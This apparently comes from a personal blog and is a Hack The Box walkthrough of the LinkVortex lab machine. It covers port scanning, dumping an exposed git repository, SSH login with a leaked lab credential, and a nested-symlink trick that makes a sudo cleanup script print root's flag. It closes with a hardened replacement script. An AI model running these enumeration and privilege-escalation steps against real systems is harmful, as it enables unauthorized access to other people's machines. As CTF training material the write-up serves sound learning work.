# Hack the Box: LinkVortex Writeup

LinkVortex is a machine from the Hack The Box lab, created by [0xyassine](https://app.hackthebox.com/users/143843). In this walkthrough, I will demonstrate how I obtained complete ownership of this machine.

[![](https://cdn.hashnode.com/res/hashnode/image/upload/v1737267474065/043ee712-b214-4180-9689-e1be2ee52cdb.png align="center")](https://www.hackthebox.com/machines/LinkVortex)

[https://www.hackthebox.com/machines/LinkVortex](https://www.hackthebox.com/machines/LinkVortex)

I have **owned** LinkVortex on Hack The Box:

https://www.hackthebox.com/achievement/machine/615731/638

# Nmap Scanning

```bash
$ nmap -vvv -p- -T4 -oA nmap/initial 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 14:49:12 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p- -T4 -oA nmap/initial 10.10.11.47
Increasing send delay for 10.10.11.47 from 0 to 5 due to 629 out of 1571 dropped probes since last increase.
Increasing send delay for 10.10.11.47 from 5 to 10 due to 75 out of 186 dropped probes since last increase.
Warning: 10.10.11.47 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.47
Host is up, received reset ttl 63 (0.65s latency).
Scanned at 2024-12-13 14:49:13 +0545 for 2713s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
# Nmap done at Fri Dec 13 15:34:26 2024 -- 1 IP address (1 host up) scanned in 2715.23 seconds
```

Here we can see that ports 22 (ssh) and 80 (http) are open. Next, a service and default-script scan of those two ports is run with nmap, which gives:

```bash
$ nmap -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47

# Nmap 7.94SVN scan initiated Fri Dec 13 16:51:54 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p22,80 -sC -sV -oA nmap/ports 10.10.11.47
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received echo-reply ttl 63 (0.55s latency).
Scanned at 2024-12-13 16:51:54 +0545 for 36s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
|   256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open  http    syn-ack ttl 63 Apache httpd
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-server-header: Apache
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
|_http-generator: Ghost 5.58
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-title: BitByBit Hardware
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 13 16:52:30 2024 -- 1 IP address (1 host up) scanned in 36.66 seconds
```

As there is a web service running, we curl it to get some initial information about the IP:

```bash
$ curl -v 10.10.11.47
```

This returns some HTML showing that the site has moved permanently to `linkvortex.htb`, so we add that hostname to our hosts file so the URL resolves from our machine:

```bash
$ sudo nano /etc/hosts
```

Add the IP and its corresponding hostname in the text editor:

```plaintext
#.....
..
10.10.11.47    linkvortex.htb
.......
.......
```

Now when we open `linkvortex.htb` in the browser it loads without errors.

# Enumeration

```bash
$ gobuster dir -u http://linkvortex.htb -w /usr/share/wordlists/dirb/common.txt
# or
$ dirsearch -r http://linkvortex.htb
```

```bash
$ gobuster dns -d linkvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```

# git dumper

```bash
$ git-dumper http://10.10.11.47/ ./linkvortex_dumped
```

**Find**

```bash
# search the dumped repository recursively for anything credential-like
$ grep -iR password .
```

By guessing, we find `admin@linkvortex.htb` as a valid email address.

Using Wappalyzer we see that Ghost 5.58 is running, so we search for CVEs affecting that version.

# Get user flag

On searching, we find a GitHub repo written by the creator of this machine:

[https://github.com/0xyassine/CVE-2023-40028](https://github.com/0xyassine/CVE-2023-40028)

From the Dockerfile in that repo we see that the Ghost config is copied to `/var/lib/ghost/config.production.json`; that file provides us with a username and password that also work for `ssh`:

```bash
username:bob@linkvortex.htb
password:fibber-talented-worth
```

Using that username and password we log in to the system over ssh:

```bash
$ ssh bob@linkvortex.htb
```

Where we cat out our user.txt flag.

# Get root flag

Use `sudo -l` to check what bob is allowed to execute, and we find:

```bash
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT
 
User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
```

`/usr/bin/bash /opt/ghost/clean_symlink.sh` does not require a password to execute, so we read the script:

```bash
bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh 
#!/bin/bash
 
QUAR_DIR="/var/quarantined"
 
if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi
 
LINK=$1
 
if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
 
if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
```

The script only inspects the first hop of the link (`readlink`, not `readlink -f`) when it greps for `etc` or `root`, and sudo preserves `CHECK_CONTENT` from our environment (`env_keep+=CHECK_CONTENT`), so we can set `CHECK_CONTENT=true` while executing the sudo command:

```bash
$ ln -s /root/root.txt flag.txt
$ ln -s /home/bob/flag.txt flag.png
$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh flag.png
```

This prints the root flag.
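For comparison, here is a hardened version of the link check as an added example; it is not the box's `/opt/ghost/clean_symlink.sh`, the function name `check_link_target` is chosen for this example, and it assumes GNU `readlink -f`. It resolves the whole symlink chain before matching the canonical path against the protected directories, and quotes every path variable.

```shell
# Added example (not the box's script): a hardened replacement for the
# link-target check in /opt/ghost/clean_symlink.sh.

# check_link_target LINK
#   returns 0 if LINK is a .png symlink whose final target is outside
#             /etc and /root (safe to quarantine),
#           1 if the final target is inside /etc or /root, or cannot be
#             resolved (the link must be removed, not quarantined),
#           2 if LINK is not a symlink ending in .png.
check_link_target() {
  link=$1
  case "$link" in *.png) ;; *) return 2 ;; esac
  [ -L "$link" ] || return 2
  # readlink -f follows every hop (flag.png -> flag.txt -> /root/root.txt)
  # and normalises ../ components, unlike the single-hop readlink the
  # original script relies on; quoting stops word splitting on spaces.
  target=$(readlink -f -- "$link") || return 1
  case "$target" in
    /etc|/etc/*|/root|/root/*) return 1 ;;
    *) return 0 ;;
  esac
}

# Demo on constructed links in a temporary directory. It needs no access
# to /root: readlink -f only requires the parent directories to exist,
# and a resolution failure is treated as a rejection anyway.
demo() {
  d=$(mktemp -d)
  ln -s /root/root.txt "$d/flag.txt"   # first hop: names a protected file
  ln -s "$d/flag.txt" "$d/flag.png"    # second hop: what sudo would be given
  ln -s /tmp "$d/ok.png"               # benign link for comparison
  check_link_target "$d/flag.png" && nested=0 || nested=$?
  check_link_target "$d/ok.png" && benign=0 || benign=$?
  rm -rf "$d"
  echo "nested link rc=$nested (1 = remove), benign link rc=$benign (0 = quarantine)"
}

demo
```

The remaining weakness on the page, `env_keep+=CHECK_CONTENT`, is a sudoers setting rather than a script bug: a root-run script should not let the calling user decide whether it prints file contents.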
